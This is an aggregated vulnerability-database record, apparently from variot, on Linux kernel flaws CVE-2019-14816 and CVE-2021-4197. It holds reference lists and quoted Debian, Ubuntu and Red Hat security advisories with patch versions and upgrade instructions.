"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/o3rudqjxrjqvghcgr4yzwtq3ecbi7txh/"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/errata/rhsa-2020:0204"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20191031-0005/"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/errata/rhsa-2020:0664"
},
{
"trust": 1.6,
"url": "https://usn.ubuntu.com/4163-1/"
},
{
"trust": 1.6,
"url": "https://usn.ubuntu.com/4162-2/"
},
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/154951/kernel-live-patch-security-notice-lsn-0058-1.html"
},
{
"trust": 1.6,
"url": "https://github.com/torvalds/linux/commit/7caac62ed598a196d6ddf8d9c121e12e082cac3"
},
{
"trust": 1.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=cve-2019-14816"
},
{
"trust": 1.6,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00066.html"
},
{
"trust": 1.6,
"url": "https://seclists.org/bugtraq/2019/nov/11"
},
{
"trust": 1.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/t4jz6aeukfwbhqarogmqarj274pqp2qp/"
},
{
"trust": 1.6,
"url": "https://usn.ubuntu.com/4157-2/"
},
{
"trust": 1.6,
"url": "https://access.redhat.com/errata/rhsa-2020:0653"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14816"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/errata/rhsa-2020:1266"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1744149"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2020:1353"
},
{
"trust": 0.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/o3rudqjxrjqvghcgr4yzwtq3ecbi7txh/"
},
{
"trust": 0.6,
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7caac62ed598a196d6ddf8d9c121e12e082cac3a"
},
{
"trust": 0.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/t4jz6aeukfwbhqarogmqarj274pqp2qp/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/errata/rhsa-2020:1347"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192984-1.html"
},
{
"trust": 0.6,
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00237.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192658-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192651-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192953-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192952-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192951-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192950-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192949-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192948-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192947-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192946-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192424-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192414-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192412-1.html"
},
{
"trust": 0.6,
"url": "https://www.suse.com/support/update/announcement/2019/suse-su-20192648-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/156608/red-hat-security-advisory-2020-0664-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-buffer-overflow-via-net-wireless-marvell-mwifiex-30180"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3570/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1248/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0766/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4346/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0415/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4252/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157140/red-hat-security-advisory-2020-1347-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3835/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/156020/red-hat-security-advisory-2020-0174-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3817/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.0790/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/154897/ubuntu-security-notice-usn-4157-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/156216/red-hat-security-advisory-2020-0375-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1172/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.3897/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3064/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4346.2/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.5,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.5,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-17133"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17133"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15505"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15902"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14821"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14815"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14895"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-14895"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15118"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15117"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-21008"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14814"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14898"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14901"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14901"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14898"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-18232"
},
{
"trust": 0.2,
"url": "https://usn.ubuntu.com/4163-1"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/solutions/3523601"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14815"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18660"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-3693"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-18559"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3846"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3846"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-8912"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-11487"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-11487"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10126"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-18559"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-8912"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-3693"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18660"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14814"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10126"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20976"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17666"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20976"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17666"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.0.0-1019.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.0.0-1020.20"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4157-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.0.0-32.34"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15504"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2181"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/5.0.0-1024.25"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16714"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.0.0-1023.24"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.0.0-1020.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1021.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1027.30~16.04.1"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4162-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1048.48"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1052.54~16.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1047.50"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1027.30"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-66.75"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1059.68"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1061.66"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1046.49"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1049.53"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-15918"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1066.73"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-66.75~16.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1052.54"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4163-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-166.195"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1128.136"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1124.133"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1060.67"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1096.107"
}
],
"sources": [
{
"db": "PACKETSTORM",
"id": "156020"
},
{
"db": "PACKETSTORM",
"id": "157042"
},
{
"db": "PACKETSTORM",
"id": "156213"
},
{
"db": "PACKETSTORM",
"id": "156603"
},
{
"db": "PACKETSTORM",
"id": "154897"
},
{
"db": "PACKETSTORM",
"id": "154934"
},
{
"db": "PACKETSTORM",
"id": "154946"
},
{
"db": "PACKETSTORM",
"id": "156216"
},
{
"db": "PACKETSTORM",
"id": "154935"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
},
{
"db": "NVD",
"id": "CVE-2019-14816"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "PACKETSTORM",
"id": "156020",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "157042",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "156213",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "156603",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154897",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154934",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154946",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "156216",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "154935",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-201908-2176",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2019-14816",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2020-01-21T19:10:15",
"db": "PACKETSTORM",
"id": "156020",
"ident": null
},
{
"date": "2020-04-01T15:21:52",
"db": "PACKETSTORM",
"id": "157042",
"ident": null
},
{
"date": "2020-02-05T18:37:11",
"db": "PACKETSTORM",
"id": "156213",
"ident": null
},
{
"date": "2020-03-03T14:09:01",
"db": "PACKETSTORM",
"id": "156603",
"ident": null
},
{
"date": "2019-10-17T15:18:45",
"db": "PACKETSTORM",
"id": "154897",
"ident": null
},
{
"date": "2019-10-22T17:26:43",
"db": "PACKETSTORM",
"id": "154934",
"ident": null
},
{
"date": "2019-10-23T18:28:39",
"db": "PACKETSTORM",
"id": "154946",
"ident": null
},
{
"date": "2020-02-05T18:49:35",
"db": "PACKETSTORM",
"id": "156216",
"ident": null
},
{
"date": "2019-10-22T17:26:50",
"db": "PACKETSTORM",
"id": "154935",
"ident": null
},
{
"date": "2019-08-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201908-2176",
"ident": null
},
{
"date": "2019-09-20T19:15:11.767000",
"db": "NVD",
"id": "CVE-2019-14816",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-03-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201908-2176",
"ident": null
},
{
"date": "2024-11-21T04:27:25.253000",
"db": "NVD",
"id": "CVE-2019-14816",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "154897"
},
{
"db": "PACKETSTORM",
"id": "154934"
},
{
"db": "PACKETSTORM",
"id": "154935"
},
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
}
],
"trust": 0.9
},
"title": {
"_id": null,
"data": "Linux kernel Buffer error vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
}
],
"trust": 0.6
}
}
VAR-202201-0496
Vulnerability from variot - Updated: 2026-03-09 20:52

An unprivileged write to the file handler flaw was found in the Linux kernel's control groups and namespaces subsystem, in the way users can access less privileged processes that are controlled by cgroups and have a higher privileged parent process. It affects both the cgroup v1 and cgroup v2 versions of control groups. A local user could use this flaw to crash the system or escalate their privileges on the system. The Linux kernel contains an authentication vulnerability; information may be obtained, information may be tampered with, and service operation may be interrupted (DoS). The Linux kernel is the kernel used by the Linux Foundation's open source operating system Linux. Attackers can use this vulnerability to bypass kernel restrictions and elevate their privileges by writing to a cgroup file descriptor.
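The migration path at issue here is visible from user space: a process is moved between control groups by writing its PID to the target group's cgroup.procs file, and CVE-2021-4197 concerns which credentials the kernel checks when that write happens. A minimal sketch of inspecting the current process's cgroup membership follows (assuming a Linux system with /proc mounted; the migration write itself is shown only as a comment, since it needs root and a real target group — the path is illustrative):

```shell
# Show which cgroup(s) the current shell belongs to.
# cgroup v2 prints a single "0::/path" line; cgroup v1 prints one line
# per mounted controller ("N:controller:/path").
cat /proc/self/cgroup

# Moving a process is a plain file write (root required; path is a
# hypothetical placeholder, not from the advisory above):
#   echo $$ > /sys/fs/cgroup/<target-group>/cgroup.procs
# The CVE-2021-4197 fix makes the kernel check the credentials captured
# when cgroup.procs was opened, not those of the (possibly more
# privileged) process performing the write.
```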
Debian Security Advisory DSA-5127-1                   security@debian.org
https://www.debian.org/security/                     Salvatore Bonaccorso
May 02, 2022                         https://www.debian.org/security/faq

Package        : linux
CVE ID         : CVE-2021-4197 CVE-2022-0168 CVE-2022-1016 CVE-2022-1048
                 CVE-2022-1158 CVE-2022-1195 CVE-2022-1198 CVE-2022-1199
                 CVE-2022-1204 CVE-2022-1205 CVE-2022-1353 CVE-2022-1516
                 CVE-2022-26490 CVE-2022-27666 CVE-2022-28356 CVE-2022-28388
                 CVE-2022-28389 CVE-2022-28390 CVE-2022-29582
Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks. The security impact is negligible as CAP_SYS_ADMIN inherently gives the ability to deny service.
CVE-2022-1016
David Bouman discovered a flaw in the netfilter subsystem where the
nft_do_chain function did not initialize register data that
nf_tables expressions can read from and write to.
CVE-2022-1158
Qiuhao Li, Gaoning Pan, and Yongkang Jia discovered a bug in the
KVM implementation for x86 processors. A local user with access to
/dev/kvm could cause the MMU emulator to update page table entry
flags at the wrong address.
CVE-2022-1199, CVE-2022-1204, CVE-2022-1205
Duoming Zhou discovered race conditions in the AX.25 hamradio
protocol, which could lead to a use-after-free or null pointer
dereference.
CVE-2022-1353
The TCS Robot tool found an information leak in the PF_KEY
subsystem.
CVE-2022-1516
A NULL pointer dereference flaw in the implementation of the X.25
set of standardized network protocols, which can result in denial
of service.
This driver is not enabled in Debian's official kernel
configurations.
CVE-2022-26490
Buffer overflows in the STMicroelectronics ST21NFCA core driver can
result in denial of service or privilege escalation.
This driver is not enabled in Debian's official kernel
configurations.
CVE-2022-27666
"valis" reported a possible buffer overflow in the IPsec ESP
transformation code.
For the stable distribution (bullseye), these problems have been fixed in version 5.10.113-1.
We recommend that you upgrade your linux packages.
For the detailed security status of linux please refer to its security tracker page at: https://security-tracker.debian.org/tracker/linux
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org

==========================================================================
Ubuntu Security Notice USN-5513-1
July 13, 2022
linux-aws vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in the Linux kernel.
Software Description: - linux-aws: Linux kernel for Amazon Web Services (AWS) systems
Details:
Norbert Slusarek discovered a race condition in the CAN BCM networking protocol of the Linux kernel leading to multiple use-after-free vulnerabilities. A local attacker could use this issue to execute arbitrary code. (CVE-2021-3609)
Likang Luo discovered that a race condition existed in the Bluetooth subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3752)
It was discovered that the NFC subsystem in the Linux kernel contained a use-after-free vulnerability in its NFC Controller Interface (NCI) implementation. A local attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-3760)
Szymon Heidrich discovered that the USB Gadget subsystem in the Linux kernel did not properly restrict the size of control requests for certain gadget types, leading to possible out of bounds reads or writes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-39685)
It was discovered that the Ion Memory Manager subsystem in the Linux kernel contained a use-after-free vulnerability. A local attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-39714)
Eric Biederman discovered that the cgroup process migration implementation in the Linux kernel did not perform permission checks correctly in some situations. (CVE-2021-4197)
Lin Ma discovered that the NFC Controller Interface (NCI) implementation in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-4202)
Sushma Venkatesh Reddy discovered that the Intel i915 graphics driver in the Linux kernel did not perform a GPU TLB flush in some situations. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2022-0330)
It was discovered that the PF_KEYv2 implementation in the Linux kernel did not properly initialize kernel memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2022-1353)
It was discovered that the virtual graphics memory manager implementation in the Linux kernel was subject to a race condition, potentially leading to an information leak. (CVE-2022-1419)
Minh Yuan discovered that the floppy disk driver in the Linux kernel contained a race condition, leading to a use-after-free vulnerability. A local attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2022-1652)
It was discovered that the Atheros ath9k wireless device driver in the Linux kernel did not properly handle some error conditions, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2022-1679)
It was discovered that the Marvell NFC device driver implementation in the Linux kernel did not properly perform memory cleanup operations in some situations, leading to a use-after-free vulnerability. A local attacker could possibly use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2022-1734)
It was discovered that some Intel processors did not completely perform cleanup actions on multi-core shared buffers. A local attacker could possibly use this to expose sensitive information. (CVE-2022-21123)
It was discovered that some Intel processors did not completely perform cleanup actions on microarchitectural fill buffers. A local attacker could possibly use this to expose sensitive information. (CVE-2022-21125)
It was discovered that some Intel processors did not properly perform cleanup during specific special register write operations. A local attacker could possibly use this to expose sensitive information. (CVE-2022-21166)
It was discovered that the USB Gadget file system interface in the Linux kernel contained a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2022-24958)
赵子轩 discovered that the 802.2 LLC type 2 driver in the Linux kernel did not properly perform reference counting in some error conditions. (CVE-2022-28356)
It was discovered that the 8 Devices USB2CAN interface implementation in the Linux kernel did not properly handle certain error conditions, leading to a double-free. (CVE-2022-28388)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 ESM: linux-image-4.4.0-1109-aws 4.4.0-1109.115 linux-image-aws 4.4.0.1109.106
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
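After applying an update like the one above, the standard check is to confirm that the machine actually rebooted into the fixed kernel. A minimal sketch follows (the apt commands are shown only as comments because they need root and access to the ESM repositories; the 4.4.0-1109 version string comes from the package table above):

```shell
# Typical update sequence on the affected host (run with root privileges):
#   sudo apt-get update
#   sudo apt-get dist-upgrade
#   sudo reboot
# After the reboot, confirm which kernel release is actually running and
# compare it against the fixed version from the advisory (4.4.0-1109 for
# linux-aws on Ubuntu 14.04 ESM):
echo "Running kernel: $(uname -r)"
```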
References: https://ubuntu.com/security/notices/USN-5513-1 CVE-2021-3609, CVE-2021-3752, CVE-2021-3760, CVE-2021-39685, CVE-2021-39714, CVE-2021-4197, CVE-2021-4202, CVE-2022-0330, CVE-2022-1353, CVE-2022-1419, CVE-2022-1652, CVE-2022-1679, CVE-2022-1734, CVE-2022-21123, CVE-2022-21125, CVE-2022-21166, CVE-2022-24958, CVE-2022-28356, CVE-2022-28388 . Summary:
Red Hat OpenShift Container Platform release 4.9.45 is now available with updates to packages and images that fix several bugs and add enhancements.
This release includes a security update for Red Hat OpenShift Container Platform 4.9.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.9.45. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHBA-2022:5878
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html
Security Fix(es):
- openshift: oauth-serving-cert configmap contains cluster certificate private key (CVE-2022-2403)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.45-x86_64
The image digest is sha256:8ab373599e8a010dffb9c7ed45e01c00cb06a7857fe21de102d978be4738b2ec
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.45-s390x
The image digest is sha256:1dde8a7134081c82012a812e014daca4cba1095630e6d0c74b51da141d472984
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.9.45-ppc64le
The image digest is sha256:ec1fac628bec05eb6425c2ae9dcd3fca120cd1a8678155350bb4c65813cfc30e
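The release payloads above are pinned by content digest, so a mirrored or locally stored copy can be checked by recomputing its SHA-256 and comparing against the published sha256:<hex> string. A toy sketch of producing a digest in that form over a sample byte string (the payload value is made up; with a real cluster you would compare against the digest reported by the oc adm release info commands above):

```shell
# Compute a digest in the same "sha256:<64 hex chars>" form used above.
payload='example-release-payload'   # stand-in for the real image bytes
digest="sha256:$(printf '%s' "$payload" | sha256sum | awk '{print $1}')"
echo "$digest"
# A mismatch between this value and the published digest would indicate
# a corrupted or tampered copy of the release payload.
```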
All OpenShift Container Platform 4.9 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
2009024 - Unable to complete cluster destruction, some ports are left over 2055494 - console operator should report Upgradeable False when SAN-less certs are used 2083554 - post 1.23 rebase: regression in service-load balancer reliability 2087021 - configure-ovs.sh fails, blocking new RHEL node from being scaled up on cluster without manual reboot 2088539 - Openshift route URLs starting with double slashes stopped working after update to 4.8.33 - curl version problems 2091806 - Cluster upgrade stuck due to "resource deletions in progress" 2095320 - [4.9] Bootimage bump tracker 2097157 - [4.9z] During ovnkube-node restart all host conntrack entries are flushed, leading to traffic disruption 2100786 - [OCP 4.9] Ironic cannot match "wwn" rootDeviceHint for a multipath device 2101664 - disabling ipv6 router advertisements using "all" does not disable it on secondary interfaces 2101959 - CVE-2022-2403 openshift: oauth-serving-cert configmap contains cluster certificate private key 2103982 - [4.9] AWS EBS CSI driver stuck removing EBS volumes - GetDeviceMountRefs check failed 2105277 - NetworkPolicies: ovnkube-master pods crashing due to panic: "invalid memory address or nil pointer dereference" 2105453 - Node reboot causes duplicate persistent volumes 2105654 - egressIP panics with nil pointer dereference 2105663 - APIRequestCount does not identify some APIs removed in 4.9 2106655 - Kubelet slowly leaking memory and pods eventually unable to start 2108538 - [4.9.z backport] br-ex not created due to default bond interface having a different mac address than expected 2108619 - ClusterVersion history pruner does not always retain initial completed update entry
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.

RHSA-announce mailing list: RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce

Relevant releases/architectures:
Red Hat Enterprise Linux Real Time EUS (v.8.4) - x86_64 Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4) - x86_64
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
- kernel: Small table perturb size in the TCP source port generation algorithm can lead to information leak (CVE-2022-1012)

